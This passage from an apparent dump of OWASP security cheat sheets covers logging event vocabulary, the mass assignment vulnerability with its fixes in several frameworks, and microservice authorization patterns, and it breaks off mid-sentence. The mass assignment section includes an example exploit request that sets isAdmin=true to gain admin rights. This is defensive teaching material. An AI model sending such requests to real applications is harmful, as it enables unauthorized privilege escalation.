"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_deleteuseridfileobject","title":"sensitive_delete:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should have deletions of the data logged and reviewed periodically. The file should not be immediately deleted but marked for deletion and an archive of the file should be maintained according to legal/privacy requirements.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_delete:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 marked file /users/admin/some/important/path for deletion\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sequence-errors-sequence","title":"Sequence Errors [SEQUENCE]","text":"

Also called business logic attacks: if a specific path through the system is expected and an attempt is made to skip or change the order of that path, it could indicate malicious intent.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sequence_failuserid","title":"sequence_fail:[userid]","text":"

Description When a user reaches a part of the application out of sequence it may indicate intentional abuse of the business logic and should be tracked.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sequence_fail:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has reached a part of the application out of the normal application flow.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session-management-session","title":"Session Management [SESSION]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_createduserid","title":"session_created:[userid]","text":"

Description When a new authenticated session is created that session may be logged and activity monitored.

Level: INFO

Example:

    {\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_created:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has started a new session\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_reneweduserid","title":"session_renewed:[userid]","text":"

Description When a user is warned that their session is about to expire or be revoked and chooses to extend it, that activity should be logged. Also, if the system in question contains highly confidential data, then extending a session may require additional verification.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_renewed:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 was warned of expiring session and extended.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_expireduseridreason","title":"session_expired:[userid,reason]","text":"

Description When a session expires, especially in the case of an authenticated session or with sensitive data, then that session expiry may be logged and clarifying data included. The reason code may be any value, such as: logout, timeout, revoked, etc. If revocation is required, sessions should be expired rather than deleted.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_expired:joebob1,revoked\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 session expired due to administrator revocation.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#session_use_after_expireuserid","title":"session_use_after_expire:[userid]","text":"

Description In the case a user attempts to access systems with an expired session, it may be helpful to log it, especially if combined with a subsequent login failure. This could identify a case where a malicious user is attempting a session hijack or directly accessing another person's machine/browser.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"session_use_after_expire:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 attempted access after session expired.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#system-events-sys","title":"System Events [SYS]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_startupuserid","title":"sys_startup:[userid]","text":"

Description When a system is first started it can be valuable to log the startup, even if the system is serverless or a container, especially if it is possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_startup:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 spawned a new instance\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_shutdownuserid","title":"sys_shutdown:[userid]","text":"

Description When a system is shut down it can be valuable to log the event, even if the system is serverless or a container, especially if it is possible to log the user that initiated the shutdown.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_shutdown:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 stopped this instance\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_restartuserid","title":"sys_restart:[userid]","text":"

Description When a system is restarted it can be valuable to log the event, even if the system is serverless or a container, especially if it is possible to log the user that initiated the restart.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_restart:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 initiated a restart\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_crashreason","title":"sys_crash[:reason]","text":"

Description If it is possible to catch an unstable condition resulting in the crash of a system, logging that event could be helpful, especially if the event is triggered by an attack.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_crash:outofmemory,\n    \"level\": \"WARN\",\n    \"description\": \"The system crashed due to Out of Memory error.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_monitor_disableduseridmonitor","title":"sys_monitor_disabled:[userid,monitor]","text":"

Description If your systems contain agents responsible for file integrity, resources, logging, virus, etc. it is especially valuable to know if they are halted and by whom.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_monitor_disabled:joebob1,crowdstrike\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has disabled CrowdStrike\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_monitor_enableduseridmonitor","title":"sys_monitor_enabled:[userid,monitor]","text":"

Description If your systems contain agents responsible for file integrity, resources, logging, virus, etc. it is especially valuable to know if they are started again after being stopped, and by whom.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_monitor_enabled:joebob1,crowdstrike\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has enabled CrowdStrike\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user-management-user","title":"User Management [USER]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_createduseridnewuseridattributesonetwothree","title":"user_created:[userid,newuserid,attributes[one,two,three]]","text":"

Description When creating new users, logging the specifics of the user creation event is helpful, especially if new users can be created with administration privileges.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_created:joebob1,user1,admin:create,update,delete\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 created user1 with admin:create,update,delete privilege attributes\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_updateduseridonuseridattributesonetwothree","title":"user_updated:[userid,onuserid,attributes[one,two,three]]","text":"

Description When updating users, logging the specifics of the user update event is helpful, especially if users can be updated with administration privileges.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_updated:joebob1,user1,admin:create,update,delete\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 updated user1 with attributes admin:create,update,delete privilege attributes\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_archiveduseridonuserid","title":"user_archived:[userid,onuserid]","text":"

Description It is always best to archive users rather than deleting them, except where required. When archiving users, logging the specifics of the user archive event is helpful. A malicious user could use this feature to deny service to legitimate users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_archived:joebob1,user1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 archived user1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_deleteduseridonuserid","title":"user_deleted:[userid,onuserid]","text":"

Description It is always best to archive users rather than deleting them, except where deletion is required. When deleting users, logging the specifics of the user delete event is helpful. A malicious user could use this feature to deny service to legitimate users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_deleted:joebob1,user1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has deleted user1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#exclusions","title":"Exclusions","text":"

As important as what you DO log is what you DON'T log. Private or secret information, source code, keys, certs, etc. should never be logged.

For a comprehensive overview of items that should be excluded from logging, please see the OWASP Logging Cheat Sheet.
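
For illustration only, a minimal Java sketch of stripping excluded fields from a structured log event before it is written; the deny-listed field names and the sanitize helper are assumptions, not part of this vocabulary:

import java.util.Map;\nimport java.util.Set;\nimport java.util.stream.Collectors;\n\npublic class LogSanitizer {\n    // Hypothetical deny-list of fields that must never reach the log.\n    private static final Set<String> EXCLUDED = Set.of(\"password\", \"apikey\", \"ssn\", \"creditcardnum\");\n\n    // Returns a copy of the event with excluded fields replaced by a redaction marker.\n    public static Map<String, String> sanitize(Map<String, String> event) {\n        return event.entrySet().stream()\n            .collect(Collectors.toMap(\n                Map.Entry::getKey,\n                e -> EXCLUDED.contains(e.getKey().toLowerCase()) ? \"[REDACTED]\" : e.getValue()));\n    }\n}\n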

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html","title":"Mass Assignment Cheat Sheet","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#introduction","title":"Introduction","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#definition","title":"Definition","text":"

Software frameworks sometimes allow developers to automatically bind HTTP request parameters into program code variables or objects, to make the framework easier to use. This can sometimes cause harm.

Attackers can sometimes use this methodology to set parameters that the developer never intended, which in turn creates or overwrites variables or objects in program code that were not meant to be modified.

This is called a Mass Assignment vulnerability.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#alternative-names","title":"Alternative Names","text":"

Depending on the language/framework in question, this vulnerability can have several alternative names:

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#example","title":"Example","text":"

Suppose there is a form for editing a user's account information:

<form>\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"userid\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"password\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"email\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input type=\"submit\">\n</form>\u00a0\u00a0\n

Here is the object that the form is binding to:

public\u00a0class\u00a0User\u00a0{\nprivate\u00a0String\u00a0userid;\nprivate\u00a0String\u00a0password;\nprivate\u00a0String\u00a0email;\nprivate\u00a0boolean\u00a0isAdmin;\n\n//Getters\u00a0&\u00a0Setters\n}\n

Here is the controller handling the request:

@RequestMapping(value\u00a0=\u00a0\"/addUser\",\u00a0method\u00a0=\u00a0RequestMethod.POST)\npublic\u00a0String\u00a0submit(User\u00a0user)\u00a0{\nuserService.add(user);\nreturn\u00a0\"successPage\";\n}\n

Here is the typical request:

POST\u00a0/addUser\n...\nuserid=bobbytables&password=hashedpass&email=bobby@tables.com\n

And here is the exploit in which we set the value of the attribute isAdmin of the instance of the class User:

POST\u00a0/addUser\n...\nuserid=bobbytables&password=hashedpass&email=bobby@tables.com&isAdmin=true\n
"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#exploitability","title":"Exploitability","text":"

This functionality becomes exploitable when:

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#github-case-study","title":"GitHub case study","text":"

In 2012, GitHub was hacked using mass assignment. A user was able to upload his public key to any organization and thus make any subsequent changes in their repositories. GitHub's Blog Post.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#solutions","title":"Solutions","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#general-solutions","title":"General Solutions","text":"

An architectural approach is to create Data Transfer Objects and avoid binding input directly to domain objects. Only the fields that are meant to be editable by the user are included in the DTO.

public\u00a0class\u00a0UserRegistrationFormDTO\u00a0{\nprivate\u00a0String\u00a0userid;\nprivate\u00a0String\u00a0password;\nprivate\u00a0String\u00a0email;\n\n//NOTE:\u00a0isAdmin\u00a0field\u00a0is\u00a0not\u00a0present\n\n//Getters\u00a0&\u00a0Setters\n}\n
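
A minimal usage sketch (the /register endpoint and userService are illustrative, following the controller shown earlier): the controller binds only the DTO and copies its fields onto the domain object explicitly, so isAdmin can never be set from request parameters.

@RequestMapping(value = \"/register\", method = RequestMethod.POST)\npublic String register(UserRegistrationFormDTO form) {\n    // Copy only the allow-listed DTO fields onto the domain object.\n    User user = new User();\n    user.setUserid(form.getUserid());\n    user.setPassword(form.getPassword());\n    user.setEmail(form.getEmail());\n    // isAdmin keeps its default value and cannot be mass-assigned.\n    userService.add(user);\n    return \"successPage\";\n}\n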
"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#language-framework-specific-solutions","title":"Language & Framework specific solutions","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#spring-mvc","title":"Spring MVC","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing","title":"Allow-listing","text":"
@Controller\npublic\u00a0class\u00a0UserController\n{\n@InitBinder\npublic\u00a0void\u00a0initBinder(WebDataBinder\u00a0binder,\u00a0WebRequest\u00a0request)\n{\nbinder.setAllowedFields(\"userid\",\"password\",\"email\");\n}\n...\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing","title":"Block-listing","text":"
@Controller\npublic\u00a0class\u00a0UserController\n{\n@InitBinder\npublic\u00a0void\u00a0initBinder(WebDataBinder\u00a0binder,\u00a0WebRequest\u00a0request)\n{\nbinder.setDisallowedFields(\"isAdmin\");\n}\n...\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#nodejs-mongoose","title":"NodeJS + Mongoose","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing_1","title":"Allow-listing","text":"
var\u00a0UserSchema\u00a0=\u00a0new\u00a0mongoose.Schema({\nuserid:\u00a0String,\npassword:\u00a0String,\nemail\u00a0:\u00a0String,\nisAdmin\u00a0:\u00a0Boolean,\n});\n\nUserSchema.statics\u00a0=\u00a0{\nuserCreateSafeFields:\u00a0['userid',\u00a0'password',\u00a0'email']\n};\n\nvar\u00a0User\u00a0=\u00a0mongoose.model('User',\u00a0UserSchema);\n\n_\u00a0=\u00a0require('underscore');\nvar\u00a0user\u00a0=\u00a0new\u00a0User(_.pick(req.body,\u00a0User.userCreateSafeFields));\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing_1","title":"Block-listing","text":"
var\u00a0massAssign\u00a0=\u00a0require('mongoose-mass-assign');\n\nvar\u00a0UserSchema\u00a0=\u00a0new\u00a0mongoose.Schema({\nuserid:\u00a0String,\npassword:\u00a0String,\nemail\u00a0:\u00a0String,\nisAdmin\u00a0:\u00a0{\u00a0type:\u00a0Boolean,\u00a0protect:\u00a0true,\u00a0default:\u00a0false\u00a0}\n});\n\nUserSchema.plugin(massAssign);\n\nvar\u00a0User\u00a0=\u00a0mongoose.model('User',\u00a0UserSchema);\n\n/**\u00a0Static\u00a0method,\u00a0useful\u00a0for\u00a0creation\u00a0**/\nvar\u00a0user\u00a0=\u00a0User.massAssign(req.body);\n\n/**\u00a0Instance\u00a0method,\u00a0useful\u00a0for\u00a0updating**/\nvar\u00a0user\u00a0=\u00a0new\u00a0User;\nuser.massAssign(req.body);\n\n/**\u00a0Static\u00a0massUpdate\u00a0method\u00a0**/\nvar\u00a0input\u00a0=\u00a0{\u00a0userid:\u00a0'bhelx',\u00a0isAdmin:\u00a0'true'\u00a0};\nUser.update({\u00a0'_id':\u00a0someId\u00a0},\u00a0{\u00a0$set:\u00a0User.massUpdate(input)\u00a0},\u00a0console.log);\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#ruby-on-rails","title":"Ruby On Rails","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#django","title":"Django","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#asp-net","title":"ASP NET","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#php-laravel-eloquent","title":"PHP Laravel + Eloquent","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing_2","title":"Allow-listing","text":"
<?php\n\nnamespace\u00a0App;\n\nuse\u00a0Illuminate\\Database\\Eloquent\\Model;\n\nclass\u00a0User\u00a0extends\u00a0Model\n{\n    private\u00a0$userid;\n    private\u00a0$password;\n    private\u00a0$email;\n    private\u00a0$isAdmin;\n\n    protected\u00a0$fillable\u00a0=\u00a0array('userid','password','email');\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing_2","title":"Block-listing","text":"
<?php\n\nnamespace\u00a0App;\n\nuse\u00a0Illuminate\\Database\\Eloquent\\Model;\n\nclass\u00a0User\u00a0extends\u00a0Model\n{\n    private\u00a0$userid;\n    private\u00a0$password;\n    private\u00a0$email;\n    private\u00a0$isAdmin;\n\n    protected\u00a0$guarded\u00a0=\u00a0array('isAdmin');\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#grails","title":"Grails","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#play","title":"Play","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#jackson-json-object-mapper","title":"Jackson (JSON Object Mapper)","text":"

Take a look here and here for the documentation.
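
For illustration, a minimal sketch of one Jackson option: annotating the sensitive field so it is ignored when incoming JSON is bound (class and field names follow the earlier example; other Jackson mechanisms such as views or @JsonIgnoreProperties can achieve the same).

import com.fasterxml.jackson.annotation.JsonIgnore;\n\npublic class User {\n    private String userid;\n    private String password;\n    private String email;\n\n    // Never populated from incoming JSON (and never serialized back out).\n    @JsonIgnore\n    private boolean isAdmin;\n\n    // Getters & Setters\n}\n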

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#gson-json-object-mapper","title":"GSON (JSON Object Mapper)","text":"

Take a look here and here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#json-lib-json-object-mapper","title":"JSON-Lib (JSON Object Mapper)","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#flexjson-json-object-mapper","title":"Flexjson (JSON Object Mapper)","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#references-and-future-reading","title":"References and future reading","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html","title":"Microservices Security Cheat Sheet","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The microservice architecture is increasingly used for designing and implementing application systems in both cloud-based and on-premise infrastructures, high-scale applications and services. There are many security challenges that need to be addressed in the application design and implementation phases. The fundamental security requirements that have to be addressed during the design phase are authentication and authorization. Therefore, it is vital for application security architects to understand and properly use existing architecture patterns to implement authentication and authorization in microservices-based systems. The goal of this cheat sheet is to identify such patterns and to provide recommendations to application security architects on possible ways to use them.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#edge-level-authorization","title":"Edge-level authorization","text":"

In a simple scenario, authorization can happen only at the edge level (API gateway). The API gateway can be leveraged to centralize enforcement of authorization for all downstream microservices, eliminating the need to provide authentication and access control for each of the individual services. In such cases, NIST recommends implementing mitigating controls such as mutual authentication to prevent direct, anonymous connections to the internal services (API gateway bypass). It should be noted that authorization at the edge layer has the following limitations:

In most cases, development teams implement authorization in both places -- at the edge level at a coarse level of granularity and at the service level. To authenticate an external entity, the edge can use access tokens (referenced tokens or self-contained tokens) transmitted via HTTP headers (e.g. \u201cCookie\u201d or \u201cAuthorization\u201d) or use mTLS.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-level-authorization","title":"Service-level authorization","text":"

Service-level authorization gives each microservice more control to enforce access control policies. For further discussion, we use terms and definitions in accordance with NIST SP 800-162. The functional components of an access control system can be classified in the following way:

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-level-authorization-existing-patterns","title":"Service-level authorization: existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#decentralized-pattern","title":"Decentralized pattern","text":"

The development team implements the PDP and PEP directly at the microservice code level. All the access control rules, as well as the attributes needed to implement those rules, are defined and stored on each microservice (step 1). When a microservice receives (step 2) a request along with some authorization metadata (e.g., end user context or requested resource ID), the microservice analyzes it (step 3) in order to generate an access control policy decision and then enforces authorization (step 4). Existing programming language frameworks allow development teams to implement authorization at the microservice layer. E.g., Spring Security allows developers to enable scope checking (e.g. using scopes extracted from an incoming JWT) in the resource server and use it to enforce authorization. Implementing authorization at the source code level means that the code must be updated whenever the development team wants to modify the authorization logic.
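
As a minimal sketch of this decentralized pattern (assuming a Spring resource server with method security enabled; the endpoint and scope name are illustrative), the access control rule can be expressed directly next to the endpoint it protects:

import org.springframework.security.access.prepost.PreAuthorize;\nimport org.springframework.web.bind.annotation.GetMapping;\nimport org.springframework.web.bind.annotation.PathVariable;\nimport org.springframework.web.bind.annotation.RestController;\n\n@RestController\npublic class OrderController {\n\n    // PEP and PDP both live inside the microservice: the rule sits next to the endpoint,\n    // and the scope is taken from the JWT that the resource server has already validated.\n    @PreAuthorize(\"hasAuthority('SCOPE_orders:read')\")\n    @GetMapping(\"/orders/{id}\")\n    public String getOrder(@PathVariable String id) {\n        return \"order \" + id; // placeholder body; real code would load the order here\n    }\n}\n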

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#centralized-pattern-with-single-policy-decision-point","title":"Centralized pattern with single policy decision point","text":"

In this pattern, access control rules are defined, stored, and evaluated centrally. Access control rules are defined using the PAP (step 1) and delivered to the centralized PDP, along with the attributes needed to implement those rules (step 2). When a subject invokes a microservice endpoint (step 3), the microservice code invokes the centralized PDP via a network call and the PDP generates an access control policy decision by evaluating the query input against the access control rules and attributes (step 4). Based on the PDP decision, the microservice enforces authorization (step 5). To define access control rules, the development/operation team has to use some language or notation. Examples are Extensible Access Control Markup Language (XACML) and Next Generation Access Control (NGAC), which are standards for describing policy rules. This pattern can hurt latency due to the additional network calls to the remote PDP endpoint, but this can be mitigated by caching authorization policy decisions at the microservice level. It should be mentioned that the PDP must be operated in high-availability mode due to resilience and availability requirements. Application security architects should combine it with other patterns (e.g., authorization at the API gateway level) in order to enforce the \u201cdefense in depth\u201d principle.
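
A minimal sketch of the PEP-to-PDP network call (the PDP endpoint and its plain Permit/Deny response contract are assumptions; a real deployment would use an XACML/NGAC request format or a product-specific API), with decision caching kept out of the sketch for brevity:

import java.net.URI;\nimport java.net.http.HttpClient;\nimport java.net.http.HttpRequest;\nimport java.net.http.HttpResponse;\n\n// Sketch of a PEP asking a remote, centralized PDP for a decision over HTTP.\npublic class RemotePdpClient {\n    private final HttpClient http = HttpClient.newHttpClient();\n\n    public boolean isAllowed(String subject, String action, String resource) throws Exception {\n        String query = \"subject=\" + subject + \"&action=\" + action + \"&resource=\" + resource;\n        HttpRequest request = HttpRequest.newBuilder()\n            .uri(URI.create(\"https://pdp.internal.example/v1/decision?\" + query)) // assumed endpoint\n            .GET()\n            .build();\n        HttpResponse<String> response = http.send(request, HttpResponse.BodyHandlers.ofString());\n        // Assumed contract: the PDP answers with the plain text Permit or Deny.\n        return response.statusCode() == 200 && response.body().trim().equals(\"Permit\");\n    }\n}\n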

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#centralized-pattern-with-embedded-policy-decision-point","title":"Centralized pattern with embedded policy decision point","text":"

In this pattern, access control rules are defined centrally but stored and evaluated at the microservice level. Access control rules are defined using the PAP (step 1) and delivered to the embedded PDP, along with the attributes needed to implement those rules (step 2). When a subject invokes a microservice endpoint (step 3), the microservice code invokes the PDP and the PDP generates an access control policy decision by evaluating the query input against the access control rules and attributes (step 4). Based on the PDP decision, the microservice enforces authorization (step 5). The PDP code in this case can be implemented as a built-in microservice library or as a sidecar in a service mesh architecture. Due to possible network/host failures and network latency, it is advisable to implement the embedded PDP as a microservice library or as a sidecar on the same host as the microservice. The embedded PDP usually stores the authorization policy and policy-related data in memory to minimize external dependencies during authorization enforcement and to achieve low latency. The main difference from the \u201cCentralized pattern with single policy decision point\u201d with a caching approach is that authorization decisions are not stored on the microservice side; instead, an up-to-date authorization policy is stored on the microservice side. It should be mentioned that caching authorization decisions may lead to applying outdated authorization rules and access control violations. Netflix presented (link, link) a real case of using the \u201cCentralized pattern with embedded PDP\u201d pattern to implement authorization at the microservices level.
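
A minimal sketch of an embedded PDP packaged as a library (the role-to-action policy format and the refresh mechanism are assumptions): rules are pulled from the central PAP, kept in memory and evaluated locally, so no network call is needed on the request path:

import java.util.Map;\nimport java.util.Set;\nimport java.util.concurrent.ConcurrentHashMap;\n\n// Sketch of an embedded PDP: policies live in process memory and are refreshed from the PAP.\npublic class EmbeddedPdp {\n    // role -> set of allowed actions, e.g. viewer -> {orders:read}\n    private final Map<String, Set<String>> policy = new ConcurrentHashMap<>();\n\n    // Called periodically by a background job that pulls the latest rules from the central PAP.\n    public void refresh(Map<String, Set<String>> latestPolicy) {\n        policy.clear();\n        policy.putAll(latestPolicy);\n    }\n\n    // Local, in-memory decision: no remote PDP call on the request path.\n    public boolean isAllowed(String role, String action) {\n        return policy.getOrDefault(role, Set.of()).contains(action);\n    }\n}\n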

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#recommendation-on-how-to-implement-authorization","title":"Recommendation on how to implement authorization","text":"
  1. To achieve scalability, it is not advisable to hardcode authorization policy in source code (decentralized pattern), but to use a special language to express the policy instead. The goal is to externalize/decouple authorization from code, and not just with a gateway/proxy that acts as a checkpoint. The recommended pattern for service-level authorization is \u201cCentralized pattern with embedded PDP\u201d due to its resilience and wide adoption.
  2. The authorization solution should be a platform-level solution; a dedicated team (e.g., a platform security team) must be accountable for the development and operation of the authorization solution, as well as for sharing the microservice blueprints/libraries/components that implement authorization among development teams.
  3. The authorization solution should be based on a widely used solution, because implementing a custom solution has the following cons:
  4. There is a probability that not all access control policy can be enforced by gateways/proxies and shared authorization libraries/components, so some specific access control rules still have to be implemented at the microservice business code level. In order to do that, it is advisable for microservice development teams to use a simple questionnaire/checklist to uncover such security requirements and handle them properly during microservice development.
  5. It is advisable to implement the \u201cdefense in depth\u201d principle by enforcing authorization at:
  6. Formal procedures for access control policy, such as development, approval and roll-out, must be implemented.
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#external-entity-identity-propagation","title":"External entity identity propagation","text":"

To make fine-grained authorization decisions at the microservice level, the microservice has to understand the caller context (e.g. user ID, user roles/groups). In order to allow the internal service layer to enforce authorization, the edge layer has to propagate the authenticated external entity identity (e.g., end user context) along with the request to downstream microservices. One of the simplest ways to propagate the external entity identity is to re-use the access token received by the edge and pass it to internal microservices. It should be mentioned that this approach is highly insecure due to possible external access token leakage and may increase the attack surface, because the communication relies on a proprietary token-based system implementation: if an internal service is unintentionally exposed to the external network, then it can be directly accessed using the leaked access token. This attack is not possible if the internal service only accepts a token format known only to internal services. This pattern is also not external-access-token agnostic, i.e. internal services have to understand the external access token and support a wide range of authentication techniques to extract identity from different types of external tokens (e.g. JWT, cookie, OpenID Connect token).

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#identity-propagation-existing-patterns","title":"Identity propagation: existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#send-the-external-entity-identity-as-a-clear-or-self-signed-data-structures","title":"Send the external entity identity as a clear or self-signed data structures","text":"

In this approach the calling microservice extracts the external entity identity from the incoming request (e.g. by parsing the incoming access token), creates a data structure (e.g. JSON or a self-signed JWT) with that context and passes it on to internal microservices. In this scenario the recipient microservice has to trust the calling microservice -- if the calling microservice wants to violate access control rules, it can do so by setting any user/client ID or user roles it wants as the HTTP header. This approach is applicable only in a highly trusted environment in which every microservice is developed by a trusted development team in accordance with secure software development practices.
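
A minimal sketch of this variant (the header names and internal endpoint are assumptions): the already-authenticated caller identity is forwarded as plain request headers, which the recipient simply trusts:

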